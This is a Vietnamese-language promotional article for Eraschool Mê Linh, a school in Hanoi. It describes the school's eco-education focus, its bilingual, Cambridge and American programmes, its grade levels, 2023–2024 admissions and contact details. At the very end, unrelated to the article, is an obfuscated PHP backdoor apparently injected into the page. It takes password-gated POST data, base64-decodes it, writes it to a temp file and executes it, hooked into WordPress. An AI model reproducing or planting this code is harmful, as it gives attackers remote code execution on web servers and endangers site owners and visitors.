Trường liên cấp Eraschool Mê Linh: trường sinh thái chất lượng cao

post

Có rất nhiều lý do để trường liên cấp Eraschool Mê Linh mới ra đời nhưng đã nhận được nhiều phản hồi tích cực từ các bậc phụ huynh. Vậy những lý do đó là gì? Chất lượng giáo dục của trường như thế nào? Mời các bậc phụ huynh dành thời gian đọc bài viết dưới đây nhé:

Mô hình trường học sinh thái là gì?

Khuôn viên của Eraschool rộng hơn 20.000m2
Khuôn viên của Eraschool rộng hơn 20.000m2

Ngay từ khi thành lập, Eraschool đã chọn giáo dục sinh thái là một trong những trụ cột giáo dục của mình. Các hoạt động giáo dục sinh thái của trường được triển khai xuyên suốt mọi hoạt động học tập, được đan xen vào các môn học giúp trẻ dễ dàng hình thành nếp sống xanh, có tinh thần trách nhiệm với môi trường sống. 

Các hệ đào tạo nổi bật của trường

Cả 3 hệ đào tạo đều tập trung vào phát triển khả năng tiếng Anh của trẻ 
Cả 3 hệ đào tạo đều tập trung vào phát triển khả năng tiếng Anh của trẻ

Hiện nay Eraschool đang có 3 hệ đào tạo. Cả 3 hệ đào tạo này đều tập trung phát triển khả năng sử dụng tiếng Anh của trẻ, giúp trẻ tự tin khi giao tiếp bằng tiếng Anh để phục vụ cho các cấp học cao hơn.

Hệ song ngữ

Hệ song ngữ của trường liên cấp Eraschool Mê Linh hiện đang là hệ thu hút được nhiều sự quan tâm và chú ý của phụ huynh nhất. Chương trình học tập của hệ song ngữ là sự kết hợp của chương trình giáo dục phổ thông Quốc gia có đổi mới về phương pháp giảng dạy kết hợp với bổ trợ tiếng anh chuẩn Cambridge Assessment. Với thời lượng 10 tiết tiếng Anh/tuần, trẻ có thể sử dụng tiếng Anh như ngôn ngữ thứ 2 sau khi kết thúc bậc học.

Hệ quốc tế Cambridge 

Trẻ theo học hệ quốc tế Cambridge sẽ được học 3 môn bằng tiếng Anh theo chương trình phổ thông Cambridge. Với thời lượng 16-18 tiết tiếng Anh/tuần, sau khi kết thúc bậc học, trẻ có khả năng tư duy bằng tiếng Anh, sử dụng tiếng Anh thành thạo trong nhiều lĩnh vực khác nhau như ngôn ngữ, văn học, toán, khoa học,…

Hệ quốc tế Mỹ

Cuối cùng là hệ quốc tế Mỹ. Khi theo học hệ này, trẻ sẽ được học 3 môn bằng tiếng Anh theo chương trình phổ thông Mỹ. Hệ đào tạo này rất phù hợp với những gia đình có định hướng cho con đi du học Mỹ. 

Các cấp học hiện có ở Eraschool

Với mong muốn tạo ra một môi trường học tập ổn định và thống nhất cho trẻ, trường liên cấp Eraschool Mê Linh hiện đang có 3 cấp học. Khi trẻ theo học tại trường, phụ huynh và các con không phải lo lắng về việc tìm trường chuyển cấp bởi luôn được học trong môi trường học tập đồng nhất và an toàn.

Tiền tiểu học

Lớp tiền tiểu học đang quan sát mầm cây
Lớp tiền tiểu học đang quan sát mầm cây

Lớp tiền tiểu học là lớp dành cho các bạn 5 tuổi, chuẩn bị vào lớp 1. Khi trẻ theo học lớp tiền tiểu học của Eraschool, các con sẽ có cơ hội được trải nghiệm nhiều hơn. Nhất là được học tập nếp sinh hoạt của lớp 1; được học cách sống và gần gũi với thiên nhiên; được học các kỹ năng cơ bản để tự phục vụ bản thân; được học cách hòa nhập và giải quyết các mâu thuẫn trong cộng đồng.

Tiểu học

Các bạn lớp 1 đang trong giờ học pha chế
Các bạn lớp 1 đang trong giờ học pha chế

Với cấp tiểu học, 

Eraschool chú trọng vào việc trang bị cho trẻ phương pháp học tập hiệu quả để kích thích sự sáng tạo, hình thành và phát triển các kỹ năng cần thiết cho các giai đoạn sắp tới. Bên cạnh đó, trong cấp học này trẻ sẽ tiếp tục được học và cải thiện các kỹ năng sinh tồn cơ bản để tăng khả năng độc lập, tự chủ và hạnh phúc của trẻ. 

Trung học cơ sở

Các bạn lớp 6 đang tự chuẩn bị bữa BBQ
Các bạn lớp 6 đang tự chuẩn bị bữa BBQ

Với cấp trung học cơ sở của trường liên cấp Eraschool Mê Linh, trẻ sẽ được tiếp tục học và hoàn thiện phương pháp học để tiếp cận những tri thức mới. Những tri thức mới này sẽ giúp con thêm độc lập, tự tin, tự chủ để vào đời và sống một cuộc sống hạnh phúc, có đạo đức và có trách nhiệm với cộng đồng và môi trường xanh. 

Năm học 2023 – 2024, trường liên cấp Eraschool tổ chức tuyển sinh các lớp tiền tiểu học, tuyển sinh các lớp đầu cấp (lớp 1 và lớp 6) và tuyển sinh bổ sung các lớp 2,3,4,5,7,8,9 cho trẻ đủ điều kiện. Quy trình tuyển sinh của trường sẽ được thực hiện qua 4 bước gồm: Đăng ký dự tuyển – Đánh giá năng lực – Thủ tục nhập học – Nhập học. 

Mong rằng những thông tin trong bài viết này sẽ giúp quý phụ huynh hiểu hơn về trường liên cấp Eraschool Mê Linh. Mọi thắc mắc cũng như đăng ký tuyển sinh vào các lớp của Eraschool, mời quý phụ huynh gọi tới hotline 0899 889 818 hoặc 03 68 692 626  hoặc liên hệ Fanpage PTLC EraSchool Mê Linh- Trường học xanh để được tư vấn nhanh và chính xác nhất.

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}